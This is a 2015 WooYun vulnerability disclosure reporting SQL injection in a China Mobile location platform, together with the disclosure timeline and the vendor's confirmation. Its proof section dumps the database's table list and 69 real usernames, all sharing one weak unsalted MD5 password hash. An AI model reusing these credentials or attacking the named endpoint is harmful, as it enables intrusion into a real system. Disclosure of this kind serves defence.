当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139644

漏洞标题:中国移动无线城市位置应用平台存在SQL注入漏洞

相关厂商:中国移动

漏洞作者: qglfnt

提交时间:2015-09-10 11:26

修复时间:2015-10-26 14:04

公开时间:2015-10-26 14:04

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

RT

详细说明:

SQL注入:**.**.**.**/KnowladgeCenter/MsgView.aspx?id=5

漏洞证明:

当前库

20150907232821.png


所有库

20150907232910.png



Database: vms
[58 tables]
+----------------------+
| LocationHistorys     |
| Locations            |
| NewestLocations      |
| Suppliers            |
| Vehicle_admin_info   |
| Vehicle_contact_info |
| VmsActiveVehicles    |
| VmsApplyForms        |
| VmsArea              |
| VmsAreaApprove       |
| VmsCompany           |
| VmsDepartments       |
| VmsDrivers           |
| VmsFlowDefines       |
| VmsFlowDetails       |
| VmsFlows             |
| VmsKnowledges        |
| VmsMenus             |
| VmsMobilePower       |
| VmsMoblieMenu        |
| VmsMonitorPower      |
| VmsPoints            |
| VmsProcessFlow       |
| VmsProcessNode       |
| VmsProcessTemplate   |
| VmsRoads             |
| VmsRoleInMenus       |
| VmsRoles             |
| VmsSystemConfig      |
| VmsTasks             |
| VmsUserInRoles       |
| VmsUserSpecials      |
| VmsUsers             |
| VmsVehState          |
| VmsVehicleTypes      |
| VmsVehicles          |
| VmsWatchs            |
| accountToRole        |
| account_info         |
| baseStations         |
| department           |
| dispatch_info        |
| employee_info        |
| menu_info            |
| repair_company       |
| repair_cost          |
| role_info            |
| travel_cost          |
| vehicle_DailyMlg     |
| vehicle_accident     |
| vehicle_change       |
| vehicle_energy       |
| vehicle_info         |
| vehicle_items        |
| vehicle_mil_logs     |
| vehicle_mileage      |
| vehicle_repair       |
| vmsuserback          |
+----------------------+


字段

Database: vms
Table: VmsUsers
[12 columns]
+------------+---------+
| Column     | Type    |
+------------+---------+
| CmpId      | int     |
| vcId       | int     |
| VuDpId     | int     |
| VuEmail    | varchar |
| VuId       | int     |
| VuName     | varchar |
| VuPassword | varchar |
| VuPhone    | varchar |
| VuPY       | varchar |
| VuRemark   | varchar |
| VuTrueName | varchar |
| VuVrId     | int     |
+------------+---------+


帐号信息

Database: vms
Table: VmsUsers
[69 entries]
+------+--------+----------------------------------+
| VuId | VuName | VuPassword                       |
+------+--------+----------------------------------+
| 273  | system | C4CA4238A0B923820DCC509A6F75849B |
| 294  | zb     | C4CA4238A0B923820DCC509A6F75849B |
| 295  | yly    | C4CA4238A0B923820DCC509A6F75849B |
| 296  | wx     | C4CA4238A0B923820DCC509A6F75849B |
| 297  | admin  | C4CA4238A0B923820DCC509A6F75849B |
| 298  | wxf    | C4CA4238A0B923820DCC509A6F75849B |
| 299  | zsy    | C4CA4238A0B923820DCC509A6F75849B |
| 300  | wxj    | C4CA4238A0B923820DCC509A6F75849B |
| 301  | lwx    | C4CA4238A0B923820DCC509A6F75849B |
| 302  | lyq    | C4CA4238A0B923820DCC509A6F75849B |
| 304  | sp     | C4CA4238A0B923820DCC509A6F75849B |
| 305  | zz     | C4CA4238A0B923820DCC509A6F75849B |
| 306  | tx     | C4CA4238A0B923820DCC509A6F75849B |
| 307  | zzx    | C4CA4238A0B923820DCC509A6F75849B |
| 308  | dl     | C4CA4238A0B923820DCC509A6F75849B |
| 309  | xly    | C4CA4238A0B923820DCC509A6F75849B |
| 311  | tm     | C4CA4238A0B923820DCC509A6F75849B |
| 316  | lj     | C4CA4238A0B923820DCC509A6F75849B |
| 317  | fgy    | C4CA4238A0B923820DCC509A6F75849B |
| 318  | tym    | C4CA4238A0B923820DCC509A6F75849B |
| 319  | ly     | C4CA4238A0B923820DCC509A6F75849B |
| 320  | zx     | C4CA4238A0B923820DCC509A6F75849B |
| 321  | lq     | C4CA4238A0B923820DCC509A6F75849B |
| 322  | wln    | C4CA4238A0B923820DCC509A6F75849B |
| 323  | chm    | C4CA4238A0B923820DCC509A6F75849B |
| 324  | wgx    | C4CA4238A0B923820DCC509A6F75849B |
| 325  | lyl    | C4CA4238A0B923820DCC509A6F75849B |
| 326  | zlx    | C4CA4238A0B923820DCC509A6F75849B |
| 327  | lm     | C4CA4238A0B923820DCC509A6F75849B |
| 328  | ltf    | C4CA4238A0B923820DCC509A6F75849B |
| 329  | cs     | C4CA4238A0B923820DCC509A6F75849B |
| 330  | zyb    | C4CA4238A0B923820DCC509A6F75849B |
| 331  | ljp    | C4CA4238A0B923820DCC509A6F75849B |
| 332  | fh     | C4CA4238A0B923820DCC509A6F75849B |
| 333  | hsm    | C4CA4238A0B923820DCC509A6F75849B |
| 334  | fxd    | C4CA4238A0B923820DCC509A6F75849B |
| 335  | lhf    | C4CA4238A0B923820DCC509A6F75849B |
| 336  | zw     | C4CA4238A0B923820DCC509A6F75849B |
| 338  | wg     | C4CA4238A0B923820DCC509A6F75849B |
| 339  | shw    | C4CA4238A0B923820DCC509A6F75849B |
| 340  | gqs    | C4CA4238A0B923820DCC509A6F75849B |
| 341  | lxp    | C4CA4238A0B923820DCC509A6F75849B |
| 342  | ljd    | C4CA4238A0B923820DCC509A6F75849B |
| 343  | zxp    | C4CA4238A0B923820DCC509A6F75849B |
| 344  | db     | C4CA4238A0B923820DCC509A6F75849B |
| 345  | ysc    | C4CA4238A0B923820DCC509A6F75849B |
| 346  | pxb    | C4CA4238A0B923820DCC509A6F75849B |
| 347  | wyf    | C4CA4238A0B923820DCC509A6F75849B |
| 348  | lyk    | C4CA4238A0B923820DCC509A6F75849B |
| 349  | wyw    | C4CA4238A0B923820DCC509A6F75849B |
| 350  | zwr    | C4CA4238A0B923820DCC509A6F75849B |
| 351  | wg     | C4CA4238A0B923820DCC509A6F75849B |
| 352  | fxy    | C4CA4238A0B923820DCC509A6F75849B |
| 353  | zws    | C4CA4238A0B923820DCC509A6F75849B |
| 354  | lp     | C4CA4238A0B923820DCC509A6F75849B |
| 355  | wgm    | C4CA4238A0B923820DCC509A6F75849B |
| 356  | slw    | C4CA4238A0B923820DCC509A6F75849B |
| 357  | gq     | C4CA4238A0B923820DCC509A6F75849B |
| 358  | yw     | C4CA4238A0B923820DCC509A6F75849B |
| 359  | xc     | C4CA4238A0B923820DCC509A6F75849B |
| 360  | gby    | C4CA4238A0B923820DCC509A6F75849B |
| 361  | czj    | C4CA4238A0B923820DCC509A6F75849B |
| 362  | sjl    | C4CA4238A0B923820DCC509A6F75849B |
| 363  | gjs    | C4CA4238A0B923820DCC509A6F75849B |
| 364  | lsz    | C4CA4238A0B923820DCC509A6F75849B |
| 365  | wjb    | C4CA4238A0B923820DCC509A6F75849B |
| 366  | hqs    | C4CA4238A0B923820DCC509A6F75849B |
| 367  | yzc    | C4CA4238A0B923820DCC509A6F75849B |
| 368  | jzy    | C4CA4238A0B923820DCC509A6F75849B |
+------+--------+----------------------------------+

修复方案:

过滤参数

版权声明:转载请注明来源 qglfnt@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-11 14:03

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无